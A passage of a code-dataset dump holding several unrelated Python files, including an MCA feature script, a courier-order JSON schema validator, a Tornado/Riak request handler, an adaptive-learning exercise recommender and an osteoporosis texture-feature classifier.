analysis\nimport mca\n\n# output location for the activity feature data\nOUTPUT_LOCATION = '/home/workspace/recommendation_models/data/'\nOUTPUT_FILENAME = 'fun_data.csv'\n\ndef run(json, visualization=False):\n    playlist = _data_processing(json)\n    fun_features = _calc_mca(playlist, visualization)\n    # append the activity names\n    fun_data = pd.concat([_get_fun_names(json),fun_features], axis=1)\n    # write out to CSV\n    fun_data.to_csv(OUTPUT_LOCATION+OUTPUT_FILENAME, index=True)\n\ndef _data_processing(json):\n    df_json = _json2dataframe(json)\n    dp_json = _data_cleansing(df_json)\n    return dp_json\n    \ndef _json2dataframe(json):\n    for i, one_json in enumerate(json):\n        shaping_json = {'columns': one_json} \n        input_json = str(shaping_json).replace(\"'\", '\"')\n        se_json = pd.read_json(input_json) # json to Series\n        # on the first iteration assign se to df; afterwards concatenate se onto df\n        df_json = se_json if i == 0 else pd.concat([df_json, se_json], axis=1)\n    df_json = df_json.reindex(index=json[0].keys()) # keep the index in the same order as the json\n    return df_json\n\ndef _data_cleansing(df_json):\n    df_json.columns = df_json.loc['id'] # rename the columns to the activity ids\n    df_json.drop(['created_at','updated_at','name','id'], inplace=True) # drop unneeded rows\n    df_json = df_json.T # transpose\n    return df_json\n\ndef _calc_mca(playlist, visualization):\n    mca_counts = 
mca.MCA(playlist.astype(float)) # raises an error unless the values are float\n    # extract the result data\n    # use N=2 for a two-dimensional plot\n    rows = mca_counts.fs_r(N=2) # row data\n    cols = mca_counts.fs_c(N=2) # column data\n    if visualization == True:\n        _visualize(playlist, rows, cols)\n    return pd.DataFrame(rows).set_index(playlist.index)\n\n# visualize the results\ndef _visualize(playlist, rows, cols):\n    fig = plt.figure()\n    # rows\n    plt.scatter(rows[:, 0], rows[:, 1], c='b', marker=\"None\")\n    labels = playlist.index\n    for label, x, y in zip(labels, rows[:, 0], rows[:, 1]):\n        plt.annotate(label, xy=(x, y), c=\"b\")\n    # columns\n    plt.scatter(cols[:, 0], cols[:, 1], c='r', marker=\"None\")\n    labels = playlist.columns\n    for label, x, y in zip(labels, cols[:, 0], cols[:, 1]):\n        plt.annotate(label, xy=(x, y), c=\"r\")\n    # x and y axes\n    plt.axhline(0, color='gray')\n    plt.axvline(0, color='gray')\n    \n    fig.savefig(OUTPUT_LOCATION+'visualization.png')\n    \n# fetch the activity names\ndef _get_fun_names(json):\n    df_json = _json2dataframe(json)\n    df_json.columns = df_json.loc['id']\n    df_fun_names = df_json.loc['name']\n    return pd.DataFrame(df_fun_names)\n    \n","sub_path":"ml_models/recommendation_models/multiple_correspondence_analysis.py","file_name":"multiple_correspondence_analysis.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"278119559","text":"from datetime import datetime\n\nfrom jsonschema import validate, Draft7Validator, FormatChecker\n\n\ndef is_interval_time(s: str) -> bool:\n    if len(s) != 11 or s.find('-') != 5 or len(s.split('-')) != 2:\n        return False\n    helper = s.split('-')\n    try:\n        datetime.strptime(helper[0], \"%H:%M\").time()\n        datetime.strptime(helper[1], \"%H:%M\").time()\n        return True\n    except ValueError:\n        return False\n\n\ndef is_str_datetime_iso8601(date: str):\n    try:\n        _ = datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%f%z')\n        return True\n    except ValueError:\n        return False\n\n\ndef is_positive_int(x: int) -> bool:\n    if x <= 0:\n        return False\n    return True\n\n\ndef is_available_weight(x: float):\n    if x > 50 or x < 0.01:\n        return False\n    return True\n\n\nclass Validation:\n    def __init__(self):\n        self.checker = FormatChecker()\n        self.checker.checks(\"interval_time\")(is_interval_time)\n        self.checker.checks(\"positive_int\")(is_positive_int)\n        self.checker.checks(\"available_weight\")(is_available_weight)\n        self.checker.checks(\"format_iso_8601\")(is_str_datetime_iso8601)\n\n    def is_valid_courier(self, courier) -> bool:\n        schema = {\n            \"type\": \"object\",\n            \"properties\": {\n                \"courier_id\": {\"type\": \"integer\", \"format\": \"positive_int\"},\n                \"courier_type\": {\"type\": \"string\", \"enum\": [\"foot\", \"bike\", \"car\"]},\n                \"regions\": {\"type\": \"array\", \"items\": {\"type\": \"integer\", \"format\": \"positive_int\"}},\n                \"working_hours\": {\"type\": \"array\", \"items\": {\"type\": \"string\", \"format\": \"interval_time\"}},\n            },\n            \"required\": [\n                \"courier_id\",\n                \"courier_type\",\n                \"regions\",\n                \"working_hours\"\n            ],\n            \"additionalProperties\": False\n        }\n        return Draft7Validator(schema, format_checker=self.checker).is_valid(courier)\n\n    def is_valid_order(self, order) -> bool:\n        schema = {\n            \"type\": \"object\",\n            \"properties\": {\n                \"order_id\": {\"type\": \"integer\", \"format\": \"positive_int\"},\n                \"weight\": {\"type\": \"number\", \"format\": \"available_weight\"},\n                \"region\": {\"type\": \"integer\", \"format\": \"positive_int\"},\n                \"delivery_hours\": {\"type\": \"array\", \"items\": {\"type\": \"string\", \"format\": \"interval_time\"}},\n            },\n            
\"required\": [\n \"order_id\",\n \"weight\",\n \"region\",\n \"delivery_hours\"\n ],\n \"additionalProperties\": False\n }\n return Draft7Validator(schema, format_checker=self.checker).is_valid(order)\n\n def is_valid_json_add_courier(self, json_) -> bool:\n not_valid = []\n if json_ is None or not ('data' in json_.keys()):\n return False\n for item in json_['data']:\n if not self.is_valid_courier(item):\n not_valid.append({\"id\": item['courier_id']})\n return not_valid\n\n def is_valid_json_edit_info_courier(self, courier) -> bool:\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_type\": {\"type\": \"string\", \"enum\": [\"foot\", \"bike\", \"car\"]},\n \"regions\": {\"type\": \"array\", \"items\": {\"type\": \"integer\", \"format\": \"positive_int\"}},\n \"working_hours\": {\"type\": \"array\", \"items\": {\"type\": \"string\", \"format\": \"interval_time\"}},\n },\n \"additionalProperties\": False\n }\n return Draft7Validator(schema, format_checker=self.checker).is_valid(courier)\n\n def is_valid_json_add_orders(self, order) -> bool:\n not_valid = []\n if order is None or not ('data' in order.keys()):\n return False\n for item in order['data']:\n if not self.is_valid_order(item):\n not_valid.append({\"id\": item['order_id']})\n return not_valid\n\n def is_valid_json_orders_assign(self, json_):\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_id\": {\"type\": \"integer\", \"format\": \"positive_int\"}\n },\n \"required\": [\n \"courier_id\"\n ],\n \"additionalProperties\": False\n }\n\n return Draft7Validator(schema, format_checker=self.checker).is_valid(json_)\n\n def is_valid_json_order_complete(self, json_):\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_id\": {\n \"type\": \"integer\",\n \"format\": \"positive_int\"\n },\n \"order_id\": {\n \"type\": \"integer\",\n \"format\": \"positive_int\"\n },\n \"complete_time\": {\n \"type\": \"string\",\n \"format\": \"format_iso_8601\"\n }\n },\n \"additionalProperties\": False\n }\n\n return Draft7Validator(schema, format_checker=self.checker).is_valid(json_)\n\n\n\n\n\n\n\n\n","sub_path":"app/delivery/Validation.py","file_name":"Validation.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"11431290","text":"'''\nLeetcode- 354. 
Russian Doll Envelopes - Time limit exceeded\ntime complexity - O(N2)\nspace complexity -O(N)\nApproach - DP\n\n'''\nclass Solution:\n retval=1\n def maxEnvelopes(self, envelopes: List[List[int]]) -> int:\n if len(envelopes)==0: return 0\n envelopes.sort(key=lambda x:x[0])\n \n \n dp =[1 for _ in range(len(envelopes))]\n for i in range(1,len(envelopes)):\n maxsub=0\n for j in range(i):\n if envelopes[i][0]>envelopes[j][0] and envelopes[i][1]>envelopes[j][1]:\n maxsub=max(maxsub,dp[j])\n dp[i]=dp[i]+maxsub\n self.retval=max(self.retval,dp[i])\n \n \n return self.retval\n \n \n ","sub_path":"Problem-151.py","file_name":"Problem-151.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"302960927","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n tornado-riak\n\n Copyright (c) 2012-2013 apitrary\n\n\"\"\"\nimport logging\nimport riak\nimport tornado.ioloop\nimport tornado.web\nimport tornado.escape\nimport tornado.httpserver\nimport tornado.httputil\nfrom tornado.options import options\nfrom tornadoriak.errors import NoDictionaryException\nfrom tornadoriak.response_types import ErrorResponse\nfrom tornadoriak.response_types import Response\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n \"\"\"\n The most general handler class. Should be sub-classed by all consecutive\n handler classes.\n \"\"\"\n\n def __init__(self, application, request, **kwargs):\n super(BaseHandler, self).__init__(application, request, **kwargs)\n\n self.riak_http_client = riak.RiakClient(host=options.riak_host, port=options.riak_http_port,\n transport_class=riak.RiakHttpTransport)\n self.riak_pb_client = riak.RiakClient(host=options.riak_host, port=options.riak_pb_port,\n transport_class=riak.RiakPbcTransport)\n # Use Protobuf as default\n self.client = self.riak_pb_client\n\n def set_default_headers(self):\n self.set_header(\"Access-Control-Allow-Origin\", '*')\n self.set_header(\"Access-Control-Allow-Methods\", \"GET,PUT,POST,DELETE,OPTIONS\")\n self.set_header(\"Access-Control-Allow-Headers\", \"Content-Type, Depth, User-Agent, X-File-Size, \"\n \"X-Requested-With, X-Requested-By, If-Modified-Since, \"\n \"X-File-Name, Cache-Control, X-Api-Key\")\n\n def options(self, *args, **kwargs):\n \"\"\"\n Returning back the list of supported HTTP methods\n \"\"\"\n self.set_status(200)\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.set_header(\"Access-Control-Allow-Methods\", ', '.join([str(x) for x in self.SUPPORTED_METHODS]))\n self.write(\"ok\")\n\n def respond(self, payload, status_code=200, status_message='OK'):\n \"\"\"\n The general responder for ALL cases (success response, error response)\n \"\"\"\n if payload is None:\n payload = {}\n\n if type(payload) not in [dict, list]:\n logging.error('payload is: {}'.format(payload))\n logging.error('payload is type: {}'.format(type(payload)))\n raise NoDictionaryException()\n\n response = Response(status_code=status_code, status_message=status_message, result=payload).get_data()\n self.set_status(status_code)\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(response)\n\n def write_error(self, status_code, **kwargs):\n \"\"\"\n Called automatically when an error occurred. But can also be used to\n respond back to caller with a manual error.\n \"\"\"\n if 'exc_info' in kwargs:\n logging.error(repr(kwargs['exc_info']))\n\n message = 'Something went seriously wrong! Maybe invalid resource? 
Ask your admin for advice!'\n if 'message' in kwargs:\n message = kwargs['message']\n\n response = ErrorResponse(error_message=message)\n\n self.set_status(status_code)\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(response.get_data())\n","sub_path":"tornadoriak/base_handlers.py","file_name":"base_handlers.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"405226224","text":"# -*- coding: utf-8 -*-\nfrom nose.tools import raises\nfrom toucan.tests.helpers import chdir\nfrom toucan.jobs.basic import FileJob\n\n\n@raises(RuntimeError)\ndef test_up_to_date():\n chdir(\"file_job\")\n j = FileJob(\"old_file\", [\"new_file\"])\n assert not j.up_to_date()\n j = FileJob(\"not_existent\", [\"new_file\"])\n assert not j.up_to_date()\n j = FileJob(\"new_file\", [\"old_file\"])\n assert j.up_to_date()\n j = FileJob(\"new_file\", [\"not_existent\"])\n j.up_to_date()\n\n\n@raises(NotImplementedError)\ndef test_run():\n chdir(\"file_job\")\n j = FileJob(\"not_existent\", [])\n j.run()\n","sub_path":"toucan/tests/test_file_job.py","file_name":"test_file_job.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"240736310","text":"# -*- coding: utf-8 -*- \nfrom fonctions_utiles import vraisemblance, esperanceVraisemblance\nfrom scipy import optimize\nimport theme, competence, etudiant, exercice\n\n\n\nclass Main(object):\n \"\"\"Moteur de l'algorithme de recommendation 'Apprentissage adaptatif' \"\"\"\n\n #--------------------------------------------------------------------------\n \n def __init__(self, etudiants={}, themes={}, competences={}, exercices={}, questions={}):\n self.etudiants = etudiants\n self.themes = themes\n self.competences = competences\n self.exercices = exercices\n \n \n #--------------------------------------------------------------------------\n\n \n def actualiserNiveaux(self, idEtudiant):\n etudiant = self.etudiants[idEtudiant]\n exercices = [self.exercices[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n reponses = [etudiant.resultats[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n matriceQ = [[1 if k in exo.competences else 0 for k in self.competences.values()] for exo in exercices]\n \n bnds = [[-1, 1]]*len(self.competences)\n f = lambda x : -vraisemblance(exercices, x, matriceQ, reponses)\n opt = optimize.minimize(f, [0]*len(self.competences), bounds=bnds)\n# print(opt.x)\n# print(-opt.fun)\n maj={}\n i=1\n for items in opt.x:\n maj[i]=items\n i+=1\n etudiant.setNiveaux(maj)\n \n \n \n def genererFE(self, idEtudiant, idCompetences, nbExercices, ajouter_prerequis=False):\n \"\"\"Génère une Feuille d'Exercices correspondant à un élève et à des compétences\"\"\"\n competences = [self.competences[i] for i in idCompetences]\n if ajouter_prerequis:\n for k in competences:\n competences = competences + [kp for kp in k.prerequis]\n # Enlever les doublons\n competences = list(set(competences))\n etudiant = self.etudiants[idEtudiant]\n resultats = [self.exercices[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n reponses = [etudiant.resultats[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n matriceQ = [[1 if k in exo.competences else 0 for k in self.competences.values()] for exo in resultats]\n niveauxPred = etudiant.niveauxCompetences\n choixExercices = []\n matQchoisies = []\n for n in 
range(nbExercices):\n            maxProgres = float('-inf')\n            choixCourant = None\n            niveauxCourant = niveauxPred\n            # iterate over all candidate exercises\n            for exo in self.exercices.values():\n                # if the exercise covers the targeted competences and has not been chosen yet\n                if (not exo in choixExercices) and ([k for k in exo.competences if k in competences] != []):\n                    matQCourante = [1 if k in exo.competences else 0 for k in self.competences]\n                    bnds = [[-1, 1]]*len(self.competences)\n                    f = lambda x : -esperanceVraisemblance(resultats, choixExercices+[exo], x, matriceQ, matQchoisies+[matQCourante], reponses)\n                    opt = optimize.minimize(f, [-1]*len(self.competences), bounds=bnds)\n                    progres = sum([opt.x[c.nId]-niveauxPred[c.nId] for c in competences])\n                    if progres >= maxProgres:\n                        niveauxCourant = opt.x\n                        maxProgres = progres\n                        choixCourant = exo\n                        matQChoisie = matQCourante # remember the Q-matrix row of the best exercise so far, not of the last one evaluated\n            if choixCourant != None:\n                choixExercices.append(choixCourant)\n                matQchoisies.append(matQChoisie)\n            # once the exercise is chosen, update the predicted competence-level vector\n            niveauxPred = niveauxCourant\n        return choixExercices\n    \n    \n    \n    def choisirExercice(self, idEtudiant, idCompetences):\n        maxProgres = float('-inf')\n        choixExercice = None\n        competences = [self.competences[i] for i in idCompetences]\n        etudiant = self.etudiants[idEtudiant]\n        # iterate over all candidate exercises\n        resultats = [self.exercices[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n        reponses = [etudiant.resultats[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n        matriceQ = [[1 if k in exo.competences else 0 for k in self.competences.values()] for exo in resultats]\n        for exo in self.exercices.values():\n            # if the exercise covers the targeted competences\n            if [k for k in exo.competences if k in competences] != []:\n                matQChoisie = [1 if k in exo.competences else 0 for k in self.competences]\n                bnds = [[-1, 1]]*len(self.competences)\n                f = lambda x : -esperanceVraisemblance(resultats, [exo], x, matriceQ, [matQChoisie], reponses)\n                opt = optimize.minimize(f, [-1]*len(self.competences), bounds=bnds)\n                progres = sum([opt.x[c.nId]-etudiant.niveauxCompetences[c.nId] for c in competences])\n                if progres >= maxProgres:\n                    maxProgres = progres\n                    choixExercice = exo\n        return choixExercice\n\n    \n\n    #--------------------------------------------------------------------------\n    \n    \n    \n    def ajouterTheme(self, idTheme, nom):\n        self.themes[idTheme] = theme.Theme(idTheme, nom)\n    \n    def ajouterCompetence(self, idCompetence, nom, idTheme, idPrerequis):\n        self.competences[idCompetence] = competence.Competence(idCompetence, nom, self.themes[idTheme], prerequis=[self.competences[i] for i in idPrerequis])\n\n    def ajouterExercice(self, idExercice, enonce, reponse, idThemes, idCompetences, discriminations, facilite):\n        for k in self.competences:\n            if not k in discriminations:\n                if k in idCompetences:\n                    discriminations[k] = 1\n                else:\n                    discriminations[k] = 0 \n        self.exercices[idExercice] = exercice.Exercice(idExercice, enonce, reponse, themes=[self.themes[i] for i in idThemes], competences=[self.competences[i] for i in idCompetences], discriminations=discriminations, facilite=facilite)\n\n    def ajouterEtudiant(self, idEtudiant, prenom, nom, niveauxCompetences, resultats):\n        for k in self.exercices:\n            if not k in resultats:\n                resultats[k] = -1 \n        self.etudiants[idEtudiant] = etudiant.Etudiant(idEtudiant, prenom, nom, niveauxCompetences, resultats)\n\n\n\n    \n#==============================================================================\n\nif __name__ == \"__main__\":\n\n\n    main = 
Main()\n \n # Il faut respecter l'ordre d'import themes -> competences -> exercices, etudiants\n \n main.ajouterTheme(0, \"Arithmétique\")\n main.ajouterCompetence(0, \"Addition\", 0, [])\n main.ajouterCompetence(1, \"Soustraction\", 0, [0])\n main.ajouterCompetence(2, \"Multiplication\", 0, [0])\n\n\n # idExercice, enonce, reponse, idThemes, idCompetences, discriminations, facilite\n main.ajouterExercice(0, \"texte\", \"\", [0], [0], {}, 1)\n main.ajouterExercice(1, \"texte\", \"\", [0], [1], {}, 1)\n main.ajouterExercice(6, \"texte\", \"\", [0], [0,2], {}, 1)\n main.ajouterExercice(5, \"texte\", \"\", [0], [0], {}, 1)\n\n\n main.ajouterEtudiant(0, \"Bob\", \"Smith\", {}, {0:1, 1:1, 6:0, 5:-1})\n \n bob = main.etudiants[0]\n main.actualiserNiveaux(0)\n\n bob.resultats[5]=1\n\n main.actualiserNiveaux(0)\n \n# print(main.choisirExercice(0, [1, 2]).nId)\n# print([exo.nId for exo in main.genererFE(0, [1, 2], 3)])\n \n\n","sub_path":"mainAlgo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163745374","text":"s = int(input())\n\nmatrix = [[0 for j in range(0, s)] for i in range(0, s)]\n\ndef go(chetnost):\n num = 1\n str = 0\n row = s-1\n n=1\n\n while num < s**2-chetnost:\n for k in range(0, 2):\n for j in range(str, row, n):\n matrix[str][j] = num\n num +=1\n\n for i in range(str, row, n):\n matrix[i][row] = num\n num +=1\n\n str,row = row,str\n n = n*(-1)\n k+=1\n\n str +=1\n row -=1\nif s%2 == 0:\n go(1)\n\nelse:\n go(0)\n matrix[int(s/2)][(int(s/2))] = s**2\n\nfor i in range(0, s):\n for j in range(0, s):\n print(matrix[i][j], end=\" \")\n print()","sub_path":"Task5.6.py","file_name":"Task5.6.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"308567093","text":"import pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\n\nimport seaborn as sns\nfrom sklearn.feature_selection import mutual_info_classif, SelectKBest, chi2\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import classification_report, precision_recall_curve,\\\n confusion_matrix, accuracy_score,roc_auc_score,roc_curve, f1_score, precision_score, auc\n\nfrom collections import Counter\nfrom imblearn.under_sampling import RandomUnderSampler\n\nfrom feature_classifier_utils import ensemble_voting, GridSVM\nfrom feature_performance_utils import load_texture_feature, load_clinical_data, save_confusion_matrix, Validation, normal_porosis, save_roc_curve\n\nnp.random.seed(1010)\n\n### feature_2018 = '../final_2018_result/2018_texture_features.xlsx'\nfeature_2012 = '../final_2012_result/texture_feautures.xlsx'\nfeature_2018 = '../final_2018_result/2018_texture_features.xlsx'\nfeature_2013 = '../final_2013_result/texture_features_zscore.xlsx'\n\n# label_2018 = '../data/2018_label_dict.pickle'\n# label_2012 = '../data/2012_label_dict.pickle'\n\nlabel_2018_class3 = '../data/2018_label_dict_class3.pickle'\nlabel_2012_class3 = '../data/2012_label_dict_class3.pickle'\n\nlabel_2018_class1 = '../data/2018_label_dict_class1.pickle'\nlabel_2012_class1 = '../data/2012_label_dict_class1.pickle'\nlabel_2013_class1 = '../data/2013_label_dict_class1.pickle'\n\nclinic_2018 = '../data/2018_clinical_data.pickle'\nclinic_2012 = '../data/2012_clinical_data.pickle'\nclinic_2013 = '../data/2013_clinical_data.pickle'\n\n# 
feature_data_2018, feature_name_2018, feature_index_2018, binary_feature_label_2018 = \\\n# load_texture_feature(feature_2018, label_2018)\n\n# feature_data_2012, feature_name_2012, feature_index_2012, binary_feature_label_2012 = \\\n# load_texture_feature(feature_2012, label_2012)\n\nfeature_data_2018, feature_name_2018, feature_index_2018, feature_label_2018_class1 = \\\n load_texture_feature(feature_2018, label_2018_class1)\n\nfeature_data_2012, feature_name_2012, feature_index_2012, feature_label_2012_class1 = \\\n load_texture_feature(feature_2012, label_2012_class1)\n\nfeature_data_2013, feature_name_2013, feature_index_2013, feature_label_2013_class1 = \\\n load_texture_feature(feature_2013, label_2013_class1)\n\n\nclinical_data_2018, clinical_feature_names = load_clinical_data(clinic_2018, feature_index_2018)\nclinical_data_2012, _ = load_clinical_data(clinic_2012, feature_index_2012)\nclinical_data_2013, _ = load_clinical_data(clinic_2013, feature_index_2013)\n\nprint(feature_data_2018.shape, len(feature_label_2018_class1), len(clinical_data_2018))\nprint(feature_data_2012.shape, len(feature_label_2012_class1), len(clinical_data_2012))\nprint(feature_data_2013.shape, len(feature_label_2013_class1), len(clinical_data_2013))\n\nnum_try = 1\ntry_dict = dict()\n\nhighest_acc = 0.0\n\ninternal_feature_data = np.concatenate((feature_data_2013, feature_data_2018))\ninternal_feature_label = np.concatenate((feature_label_2013_class1, feature_label_2018_class1))\ninternal_clinical_data = np.concatenate((clinical_data_2013,clinical_data_2018))\n\nexternal_feature_data = feature_data_2012\nexternal_feature_label = feature_label_2012_class1\nexternal_clinical_data = clinical_data_2012\n\nrus = RandomUnderSampler(random_state=42)\n\nclass_3_index = ['normal label', 'penia label', 'porosis label']\nclass_3_cols = ['normal prediction', 'penia prediction', 'porosis prediction']\n\nclass_2_index = ['normal label', 'porosis & penia label']\nclass_2_cols = ['normal prediction', 'porosis & penia prediction']\n\nclass_1_index = ['normal&penia label', 'porosis label']\nclass_1_cols = ['normal&penia prediction', 'porosis prediction']\n\nif len(Counter(internal_feature_label).keys()) == 2:\n average_method = 'binary'\n conf_index = class_1_index\n conf_cols = class_1_cols\nelse:\n average_method = None\n conf_index = class_3_index\n conf_cols = class_3_cols\n \nprint('Average Method : ', average_method)\n\nfor i in range(num_try):\n \n k_dict = {}\n \n print(\"++++++++++\")\n print(i+1 , \"st try\")\n print(\"++++++++++\\n\")\n\n for k in range(1,20):\n\n selector = SelectKBest(mutual_info_classif, k = k)\n\n # k 만큼 새로운 x 데이터를 만든다\n new_x = selector.fit_transform(internal_feature_data, internal_feature_label)\n \n # late fusion (after feature selection) clinical data\n new_x = np.hstack((np.array(new_x), internal_clinical_data))\n\n # feature selection\n selector_info = selector.fit(internal_feature_data, internal_feature_label)\n selected_feature = selector_info.get_support()\n \n new_x, new_y = rus.fit_resample(new_x, internal_feature_label)\n# new_y = internal_feature_label\n \n print(\"Train Dataset\")\n print(Counter(new_y))\n\n # train test set divide\n X_train, X_test, y_train, y_test = train_test_split(new_x,\n new_y,\n test_size=0.20,\n random_state=42)\n\n # random forest classifier\n\n clf = ensemble_voting(X_train, y_train, random_state=42, cv=5)\n \n # train\n clf.fit(X_train, y_train)\n\n # evaluation\n \n print('================================')\n print(\"Internal Evaluation for k = \", 
k)\n \n internal_result = Validation(clf, X_test, y_test)\n \n # confusion = internal_result[-1]\n # save_confusion_matrix(confusion, conf_index, conf_cols, \"Internal Validation Confusion matrix\")\n\n k_dict[k] = [internal_result, selected_feature]\n \n print('================================')\n print(\"External Validation for k = \", k)\n \n new_external_x = [a[selected_feature==True] for a in np.array(external_feature_data)]\n new_external_x = np.hstack((np.array(new_external_x), external_clinical_data))\n \n new_external_x, new_y = rus.fit_resample(new_external_x, external_feature_label)\n \n print(Counter(new_y))\n \n ext_val_result = Validation(clf, new_external_x, new_y)\n \n confusion = ext_val_result[-1]; save_confusion_matrix(confusion, conf_index, conf_cols, \"External Validation Confusion matrix\")\n\n print('================================')\n \n try_dict[i] = k_dict\n\nprint('done')\n\n","sub_path":"new_osteo_feature_analysis.py","file_name":"new_osteo_feature_analysis.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"170938935","text":"import os\r\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.4 pyspark-shell'\r\nimport Part1_SparkSQL as a\r\nimport Part2_SparkStreaming as b\r\n#import Part3_Analysis_and_Visualization as c\r\n \r\ndef main():\r\n print('Hello. Welcome to the system!')\r\n entry = None\r\n while entry != 'd':\r\n entry = input('\\na) Read/Write credit card data from MariaDB to MongoDB\\\r\n \\nb) Read/Write data from \"Health Insurance Marketplace\" to MongoDB\\\r\n \\nc) Analyze/Visualize data (after loading)\\\r\n \\nd) Log out\\\r\n \\n\\nPlease choose a, b, c, or d:\\\r\n \\n>>>>> ')\r\n if entry == 'a':\r\n mdb_entry = input('\\nMariaDB Tables:\\\r\n \\n\\ta) Table One: CDW_SAPP_BRANCH\\\r\n \\n\\tb) Table Two: CDW_SAPP_CREDITCARD\\\r\n \\n\\tc) Table Three: CDW_SAPP_CUSTOMER\\\r\n \\n\\nPlease select a table from the list\\\r\n \\n>>>>> ')\r\n if mdb_entry == 'a':\r\n a.main('cdw_sapp_branch', a.branch_transformation_query, 'CDW_SAPP_D_BRANCH')\r\n elif mdb_entry == 'b':\r\n a.main('cdw_sapp_creditcard', a.cc_transformation_query, 'CDW_SAPP_D_CREDIT_CARD')\r\n elif mdb_entry == 'c':\r\n a.main('cdw_sapp_customer', a.customer_transformation_query, 'CDW_SAPP_D_CUSTOMER') \r\n elif entry == 'b':\r\n himd_entry = input('\\nHealth Insurance Marketplace Data Files:\\\r\n \\n\\ta) BenefitsCostSharing.txt\\\r\n \\n\\tb) Insurance.csv\\\r\n \\n\\tc) PlanAttributes.csv\\\r\n \\n\\td) Network.csv\\\r\n \\n\\te) ServiceArea.csv\\\r\n \\n\\nPlease select a file from the list\\\r\n \\n>>>>> ')\r\n if himd_entry == 'a':\r\n b.main(b.url_1, b.topic_1, '\\t', 'benefits_cost_sharing')\r\n b.main(b.url_2, b.topic_2, '\\t', 'benefits_cost_sharing')\r\n b.main(b.url_3, b.topic_3, '\\t', 'benefits_cost_sharing')\r\n b.main(b.url_4, b.topic_4, '\\t', 'benefits_cost_sharing')\r\n elif himd_entry == 'b':\r\n b.main(b.url_5, b.topic_5, '\\t', 'insurance')\r\n elif himd_entry == 'c':\r\n b.main(b.url_6, b.topic_6, '\\t', 'plan_attributes')\r\n elif himd_entry == 'd':\r\n b.main(b.url_7, b.topic_7, ',', 'network')\r\n elif himd_entry == 'e':\r\n b.main(b.url_8, b.topic_8, ',', 'service_area')\r\n else:\r\n print('Invalid Option...')\r\n elif entry == 'c':\r\n viz_entry = input('\\nAnalysis and Visualization Options:\\\r\n \\n\\ta) Plot state counts of ServiceAreaName, SourceName, and BusinessYear\\\r\n \\n\\tb) Plot the counts of 
sources across the country\\\r\n \\n\\tc) Do not choose\\\r\n \\n\\td) Plot the number of benefit plans in each state\\\r\n \\n\\te) Print the number of mothers who smoke\\\r\n \\n\\tf) Plot the rate of smoking for each region\\\r\n \\n\\nPlease select an option from the list\\\r\n \\n>>>>> ')\r\n if viz_entry == 'a':\r\n c.a()\r\n elif viz_entry == 'b':\r\n c.b()\r\n elif viz_entry == 'd':\r\n c.d()\r\n elif viz_entry == 'e':\r\n c.e()\r\n elif viz_entry == 'f':\r\n c.f()\r\n else:\r\n print('Invalid Option...') \r\n elif entry != 'd':\r\n print('\\nInvalid Option...')\r\n print('Closing Program. Goodbye.')\r\n \r\nif __name__=='__main__':\r\n main()","sub_path":"MainEntryPoint.py","file_name":"MainEntryPoint.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"473941422","text":"\"\"\"\n### Copied from pyrtf-ng package ### \n\n\"\"\"\n\nfrom rtf_grammar import grammar\n\nLEFT_BRACKET = '{'\nRIGHT_BRACKET = '}'\nBACKSLASH = '\\\\'\nLETTERS = range(ord('a'), ord('z') + 1) + range(ord('A'), ord('Z') + 1)\nDIGITS = range(ord('0'), ord('9') + 1 )\nSPACE = ' '\nHYPHEN = '-'\n\nclass RtfParser(object):\n\n def __init__(self, rtfData=None):\n self.rtfContent = None\n if rtfData:\n self.parse(rtfData)\n \n def parse(self, rtfData):\n \"\"\"\n # setup the tests to read the test RTF files\n >>> import os.path\n >>> package, module = os.path.split(__file__)\n >>> trunk, package = os.path.split(package)\n >>> basedir = os.path.join(trunk, 'test', 'sources', 'macrtf')\n >>> def getFileData(filename):\n ... fh = open(os.path.join(basedir, filename))\n ... data = fh.read()\n ... fh.close()\n ... return data\n\n # simple, single-word content\n #>>> data = getFileData('simpleContent.rtf')\n #>>> try:\n #... rp = RTFParser(data)\n #... import pdb;pdb.set_trace()\n #... except Exception, e:\n #... print e\n #... 
